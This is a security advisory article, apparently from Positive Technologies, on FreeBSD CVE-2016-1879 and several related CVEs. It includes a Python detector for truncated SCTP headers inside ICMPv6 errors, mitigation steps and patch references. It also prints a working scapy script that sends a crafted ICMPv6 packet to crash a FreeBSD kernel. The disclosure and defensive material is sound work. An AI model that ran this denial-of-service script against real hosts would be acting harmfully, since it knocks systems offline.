Critical Vulnerabilities Detected in FreeBSD



    The FreeBSD project team reports that a number of critical vulnerabilities have been found in the operating system. They allow attackers to conduct denial of service attacks, escalate privileges, and disclose sensitive data.

    ICMPv6 SCTP Stack Parsing Vulnerability - CVE-2016-1879


    SCTP (Stream Control Transmission Protocol) is a transport layer protocol designed to carry telephone network signaling messages over IP. It is used mainly in the networks of telecom operators.

    FreeBSD versions 9.3, 10.1, and 10.2 are affected by this vulnerability if they are built with SCTP and IPv6 support (the default configuration). To exploit the bug, the attacker needs to send a specially crafted ICMPv6 message. Successful exploitation results in a denial of service (DoS).

    The DoS results from insufficient verification of the length of the SCTP header carried inside the ICMPv6 error message. When a destination is unreachable, a router may generate an error message and return it to the sender via ICMPv6.

    Such an ICMPv6 packet encloses the original IPv6 packet, whose Next Header field indicates which upper layer protocol is encapsulated. In this case, it is SCTP.



    When the kernel receives an error message via ICMPv6, it locates the upper layer protocol packet inside it and passes it to the appropriate handler (in this case sctp6_ctlinput()). The SCTP handler assumes that the enclosed packet contains a header of sufficient length and tries to copy it using m_copydata(), which is given the offset and the number of bytes to read. Since a 12-byte block is expected, sending a packet whose SCTP header is shorter than 12 bytes leads to a null pointer dereference, which causes a critical kernel failure (kernel panic).
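    The defect described above is the absence of a length check before the 12-byte SCTP common header is copied out of the enclosed IPv6 packet. The following script is an added example, not code from the original article or from FreeBSD: it parses a raw ICMPv6 error message in pure Python, finds the enclosed IPv6 header, and reports how many bytes of SCTP header are actually present, which is exactly the check the handler was missing. The same logic can be run over packets captured at a sensor to flag messages of this shape. The sample packets, addresses, ports and verification tag are constructed for the example; the enclosed IPv6 packet is assumed to carry no extension headers, and the ICMPv6 checksum is left at zero because the check does not depend on it.

```python
import struct
from ipaddress import IPv6Address
from typing import Optional

IPV6_HEADER_LEN = 40            # fixed IPv6 header, no extension headers (assumption)
ICMPV6_ERROR_HEADER_LEN = 8     # type, code, checksum, 4 unused bytes
ICMPV6_ERROR_TYPES = (1, 2, 3, 4)  # Dest Unreachable, Packet Too Big, Time Exceeded, Parameter Problem
IPPROTO_SCTP = 132
SCTP_COMMON_HEADER_LEN = 12     # src port, dst port, verification tag, checksum


def parse_ipv6_header(buf: bytes) -> tuple:
    """Return (next_header, payload_bytes) for a fixed IPv6 header, or raise ValueError."""
    if len(buf) < IPV6_HEADER_LEN:
        raise ValueError("truncated IPv6 header")
    if buf[0] >> 4 != 6:
        raise ValueError("not an IPv6 header")
    # payload length is attacker-controlled, so the decision below uses the bytes
    # actually present rather than the advertised length
    _payload_len, next_header, _hop_limit = struct.unpack_from("!HBB", buf, 4)
    return next_header, buf[IPV6_HEADER_LEN:]


def embedded_sctp_header_bytes(icmpv6_msg: bytes) -> Optional[int]:
    """Number of SCTP header bytes present after the IPv6 header enclosed in an
    ICMPv6 error message, or None if the message is not an ICMPv6 error carrying SCTP."""
    if len(icmpv6_msg) < ICMPV6_ERROR_HEADER_LEN:
        return None
    if icmpv6_msg[0] not in ICMPV6_ERROR_TYPES:
        return None
    inner = icmpv6_msg[ICMPV6_ERROR_HEADER_LEN:]
    try:
        next_header, inner_payload = parse_ipv6_header(inner)
    except ValueError:
        return None
    if next_header != IPPROTO_SCTP:
        return None
    return len(inner_payload)


def is_truncated_sctp_icmpv6_error(icmpv6_msg: bytes) -> bool:
    """True when the enclosed SCTP header is shorter than the 12 bytes sctp6_ctlinput() copies."""
    present = embedded_sctp_header_bytes(icmpv6_msg)
    return present is not None and present < SCTP_COMMON_HEADER_LEN


# --- constructed sample messages (not captured traffic) ---------------------
def _ipv6_header(next_header: int, payload_len: int) -> bytes:
    src = IPv6Address("fe80::1").packed   # constructed addresses
    dst = IPv6Address("fe80::2").packed
    return struct.pack("!IHBB16s16s", 0x60000000, payload_len, next_header, 64, src, dst)


_ICMPV6_DEST_UNREACH = struct.pack("!BBHI", 1, 0, 0, 0)   # type 1, code 0, checksum 0, unused
_SCTP_FULL = struct.pack("!HHII", 1234, 5678, 0xDEADBEEF, 0)  # 12-byte common header

SAMPLE_VALID = _ICMPV6_DEST_UNREACH + _ipv6_header(IPPROTO_SCTP, 12) + _SCTP_FULL
SAMPLE_SHORT = _ICMPV6_DEST_UNREACH + _ipv6_header(IPPROTO_SCTP, 8) + _SCTP_FULL[:8]
SAMPLE_EMPTY = _ICMPV6_DEST_UNREACH + _ipv6_header(IPPROTO_SCTP, 0)   # no SCTP header at all
SAMPLE_TCP = _ICMPV6_DEST_UNREACH + _ipv6_header(6, 20) + bytes(20)   # enclosed TCP, not SCTP


if __name__ == "__main__":
    for name, msg in (("valid", SAMPLE_VALID), ("short", SAMPLE_SHORT),
                      ("empty", SAMPLE_EMPTY), ("tcp", SAMPLE_TCP)):
        print(f"{name:6s} sctp_bytes={embedded_sctp_header_bytes(msg)} "
              f"truncated={is_truncated_sctp_icmpv6_error(msg)}")
```

    A kernel-side fix makes the same decision in C against the mbuf chain (bytes actually present from the SCTP offset onward versus sizeof the SCTP header) and drops the message when the check fails; an IDS rule keyed on ICMPv6 error type, enclosed Next Header 132 and fewer than 12 trailing bytes captures the same condition on the wire.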

    An open SCTP socket on the target is not required to exploit the vulnerability.
    The ICMPv6 packet for the attack can be built with scapy; there are many articles on Habr devoted to this powerful tool (for example, this and this article).

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    import argparse
    import sys
    from scapy.all import *

    def get_args():
        parser = argparse.ArgumentParser(description='#' * 78, epilog='#' * 78)
        parser.add_argument("-m", "--dst_mac", type=str, help="FreeBSD mac address")
        parser.add_argument("-i", "--dst_ipv6", type=str, help="FreeBSD IPv6 address")
        parser.add_argument("-I", "--iface", type=str, help="Iface")
        options = parser.parse_args()
        if options.dst_mac is None or options.dst_ipv6 is None:
            parser.print_help()
            sys.exit(1)
        return options

    if __name__ == '__main__':
        options = get_args()
        # ICMPv6 Destination Unreachable enclosing an IPv6 header with Next Header 132 (SCTP)
        # and no SCTP header behind it, so the enclosed SCTP header is shorter than 12 bytes
        inner = IPv6(nh=132, src=options.dst_ipv6, dst='fe80::230:56ff:fea6:648c')
        pkt = Ether(dst=options.dst_mac) / IPv6(dst=options.dst_ipv6) / ICMPv6DestUnreach() / inner
        sendp(pkt, iface=options.iface)

    Video demonstration of the attack:



    To protect yourself against an attack that uses this security bug, you should do the following:

    • disable IPv6 addressing if it is not required;
    • block ICMPv6 or IPv6 traffic on the firewall;
    • disable SCTP support in the operating system kernel if it is not needed (requires a kernel rebuild).

    To fix the vulnerability, use the vendor's patch, which adds extra checks to the processing of ICMPv6 messages in the SCTP stack. The kernel has to be rebuilt afterwards.

    That's not all


    In addition, a number of other serious vulnerabilities were discovered in the system. The FreeBSD developers have released patches that fix these bugs:

    1. A DoS vulnerability caused by an error in the handling of TCP connections with the TCP_MD5SIG and TCP_NOOPT socket options enabled. For successful exploitation, an attacker needs to open a listening socket with the TCP_NOOPT option enabled (CVE-2016-1882, patch);
    2. A vulnerability that allows a local user to escalate privileges or cause a denial of service, due to an access control error in the setgroups(2) system call of the Linux compatibility layer that allows arbitrary memory locations to be overwritten with specially crafted calls (CVE-2016-1881, patch);
    3. An error in the handling of Linux robust futex lists that allows an attacker to read system memory contents (CVE-2016-1880, patch);
    4. Insecure default permissions that allow access to the bsnmpd daemon configuration file “/etc/bsnmpd.conf” (CVE-2015-5677, patch).

    To avoid problems arising from the exploitation of these vulnerabilities, Positive Technologies experts recommend using IPv6 addressing only where an application requires it, installing security updates from the OS developers in a timely manner, and using specialized tools (for example, MaxPatrol) to monitor system security.
